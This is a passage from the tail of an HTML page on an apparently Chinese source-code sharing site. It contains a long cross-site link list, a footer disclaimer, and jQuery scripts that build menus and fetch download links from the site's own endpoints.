"http://www.kylkc.cn/xq/104642.html" title="www.kylkc.cn" target="_blank">www.kylkc.cn</a></li> <li><a href = "http://dztmd.cn/xq/104642.html" title="dztmd.cn" target="_blank">dztmd.cn</a></li> <li><a href = "http://www.dztmd.cn/xq/104642.html" title="www.dztmd.cn" target="_blank">www.dztmd.cn</a></li> <li><a href = "http://pmhlw.cn/xq/104642.html" title="pmhlw.cn" target="_blank">pmhlw.cn</a></li> <li><a href = "http://www.pmhlw.cn/xq/104642.html" title="www.pmhlw.cn" target="_blank">www.pmhlw.cn</a></li> <li><a href = "http://gfxtk.cn/xq/104642.html" title="gfxtk.cn" target="_blank">gfxtk.cn</a></li> <li><a href = "http://www.gfxtk.cn/xq/104642.html" title="www.gfxtk.cn" target="_blank">www.gfxtk.cn</a></li> <li><a href = "http://tzpc.cn/xq/104642.html" title="桃子坪村" target="_blank">桃子坪村</a></li> <li><a href = "http://www.tzpc.cn/xq/104642.html" title="桃子坪村" target="_blank">桃子坪村</a></li> <li><a href = "http://jbqm.cn/xq/104642.html" title="京泊汽模" target="_blank">京泊汽模</a></li> <li><a href = "http://www.jbqm.cn/xq/104642.html" title="京泊汽模" target="_blank">京泊汽模</a></li> <li><a href = "http://sh3.cn/xq/104642.html" title="sh3.cn" target="_blank">sh3.cn</a></li> <li><a href = "http://www.sh3.cn/xq/104642.html" title="www.sh3.cn" target="_blank">www.sh3.cn</a></li> <li><a href = "http://7sh.cn/xq/104642.html" title="7sh.cn" target="_blank">7sh.cn</a></li> <li><a href = "http://www.7sh.cn/xq/104642.html" title="www.7sh.cn" target="_blank">www.7sh.cn</a></li> <li><a href = "http://95596.net/xq/104642.html" title="民生人寿" target="_blank">民生人寿</a></li> <li><a href = "http://www.95596.net/xq/104642.html" title="民生人寿" target="_blank">民生人寿</a></li> <li><a href = "http://95540.net/xq/104642.html" title="安华农业保险" target="_blank">安华农业保险</a></li> <li><a href = "http://www.95540.net/xq/104642.html" title="安华农业保险" target="_blank">安华农业保险</a></li> <li><a href = "http://12383.net/xq/104642.html" title="华夏基违规操作举报电话" target="_blank">华夏基违规操作举报电话</a></li> <li><a href = "http://www.12383.net/xq/104642.html" title="华夏基违规操作举报电话" target="_blank">华夏基违规操作举报电话</a></li> <li><a href = "http://12363.net/xq/104642.html" title="金融消费权益保护投诉咨询电话" target="_blank">金融消费权益保护投诉咨询电话</a></li> <li><a href = "http://www.12363.net/xq/104642.html" title="金融消费权益保护投诉咨询电话" target="_blank">金融消费权益保护投诉咨询电话</a></li> <li><a href = "http://boboji.net/xq/104642.html" title="钵钵鸡" target="_blank">钵钵鸡</a></li> <li><a href = "http://www.boboji.net/xq/104642.html" title="钵钵鸡" target="_blank">钵钵鸡</a></li> <li><a href = "http://r515.cn/xq/104642.html" title="r515.cn" target="_blank">r515.cn</a></li> <li><a href = "http://www.r515.cn/xq/104642.html" title="www.r515.cn" target="_blank">www.r515.cn</a></li> <li><a href = "http://g2050.cn/xq/104642.html" title="g2050.cn" target="_blank">g2050.cn</a></li> <li><a href = "http://www.g2050.cn/xq/104642.html" title="www.g2050.cn" target="_blank">www.g2050.cn</a></li> <li><a href = "http://bbc888.com/xq/104642.html" title="bbc888.com" target="_blank">bbc888.com</a></li> <li><a href = "http://www.bbc888.com/xq/104642.html" title="www.bbc888.com" target="_blank">www.bbc888.com</a></li> <li><a href = "http://blog.img.liuyifei.net/" title="博客" target="_blank">博客</a></li> </ul> </div> <p>© 2014-2024   <a href="/">img.liuyifei.net</a>   <a href="https://beian.miit.gov.cn/" target="_blank"> </a> <a href="https://beian.miit.gov.cn/" target="_blank"> <img src="/assets/index/image/icp.png" width="10"> </a> <br> <br> <strong><span style="color: #ff0000;">本站不销售产品、不代购、不提供技术支持，仅分享信息，请遵纪守法、文明上网。</span></strong> </p> </div> </footer> <div class="karbar karbar-rb"> <ul> <li class="karbar-totop"><a href="#"> <i class="tbfa"></i><span>回顶部</span></a></li> </ul> </div> <script> window.TBUI = { "www": '/', "uri": '/', "ajaxurl": '/', "ver": "8.4", "roll": "1 2", "copyoff": 0, "ajaxpager": "0", "fullimage": "1", "captcha": 0, "captcha_comment": 1, "table_scroll_m": 1, "table_scroll_w": "800", "turnstile_key": "" } </script> <script type='text/javascript' src='/assets/index/server/js/jquery.min.js' id='jquery-js' defer=""></script> <script data-minify="1" type='text/javascript' src='/assets/index/server/js/loader.js' id='loader-js' defer=""></script> <script src="/assets/index/js/tongji.js"></script> <script src="/assets/js/jquery-3.3.1.min.js"></script> <script> var token = '222586fd0cd95f5136c4d956b6aec297'; var type_server = localStorage.getItem("type_server"); var type_server_no_Level = localStorage.getItem("type_server_no_Level"); if (type_server == '' || type_server == null || type_server == undefined || type_server_no_Level == '' || type_server_no_Level == null || type_server_no_Level == undefined) { getServerData(); function getServerData() { $.post("/index/Index/getServerData", {token: token}, function (data) { if (data.code == 1) { type_server = data.data.getTypeServer; type_server_no_Level = data.data.getTypeServerNoLevel; localStorage.setItem("type_server", JSON.stringify(type_server)); localStorage.setItem("type_server_no_Level", JSON.stringify(type_server_no_Level)); indexHtml(); } }); } } else { type_server = JSON.parse(type_server); type_server_no_Level = JSON.parse(type_server_no_Level); } indexHtml(); function indexHtml() { var str = ''; for (i = 0; i < type_server.length; i++) { str += '<li'; if (type_server[i].children.length != 0) { str += ' class="menu-item-has-children"'; } str += '>'; str += '<a href="/zl/' + type_server[i].id + '">' + type_server[i].name + '</a>'; if (type_server[i].children.length != 0) { str += '<ul class="sub-menu">'; for (j = 0; j < type_server[i].children.length; j++) { str += '<li'; if (type_server[i].children[j].children.length != 0) { str += ' class="menu-item-has-children"'; } str += '>'; str += '<a href="/zl?type=' + type_server[i].children[j].id + '">' + type_server[i].children[j].name + '</a>'; if (type_server[i].children[j].children.length != 0) { str += '<ul class="sub-menu">'; for (k = 0; k < type_server[i].children[j].children.length; k++) { str += '<li><a href="/zl?type=' + type_server[i].children[j].children[k].id + '">' + type_server[i].children[j].children[k].name + '</a></li>'; } str += '</ul>'; } str += '</li>'; } str += '</ul>'; } str += ' </li>'; } $('.head-head-nav').append(str); var str1 = ''; for (st = 0; st < type_server_no_Level.length; st++) { str1 += '<a href="/zl?type=' + type_server_no_Level[st].id + '">' + type_server_no_Level[st].name + '</a>'; } $('.tbcm-newtags').append(str1); } </script> <style type="text/css"> #zfbhb { background-color: aliceblue; width: 200px; position: fixed; left: 5px; bottom: 200px; } #zfbhb img { width: 200px; } #zfbhb1 { background-color: aliceblue; width: 100px; position: fixed; right: 5px; bottom: 40px; } #zfbhb1 img { width: 100px; margin-top: 10px; } @media screen and (min-width: 1px) and (max-width: 1023px) { #zfbhb { width: 100px !important; } #zfbhb img { width: 100px; } } </style> <div id="zfbhb"> <img src="/assets/index/image/zfbhb.png" alt=""> </div> <div id="zfbhb1"> <a href="#" target="_blank" class="info-img"> <img src="/assets/index/image/ad.gif" alt="-六神源码网" style="height: 40px!important;"/> </a> <a href="" target="_blank" class="info-img"> <img src="" onerror="javascript:this.src='/assets/index/image/ad.gif';" alt="-六神源码网" style="height: 40px!important;"/> </a> </div> </body> </html> <script type='text/javascript' src='/assets/index/server/js/jquery-3.5.1.min.js'></script> <script> var is_down = '0'; var user_level = ''; var id = '104642'; var token = '222586fd0cd95f5136c4d956b6aec297'; if (is_down && user_level != '') { info(id, token); function info(id, token) { $.post("/index/Index/getServerInfo", {id: id, token: token}, function (data) { if (data.code == 1) { var str = ''; for (i = 0; i < data.data.length; i++) { str += ' <a rel="nofollow" href="' + data.data[i].url + '" class="post-like action action-like" target="_blank"\n' + ' style="background-color: #f90;color: #fff;margin-left: 5px;padding: 10px;border-radius: 5px;">\n' + ' 下载地址' + (i + 1) + '\n' + ' </a>'; } $('.post-actions').html(str); } else { $('.post-actions').html(' <a rel="nofollow" class=" \n"\n' + ' style="background-color: #f90;color: #fff;margin-left: 5px;padding: 10px;border-radius: 5px;">\n' + ' ' + data.msg + '\n' + ' </a>'); } }); } } </script>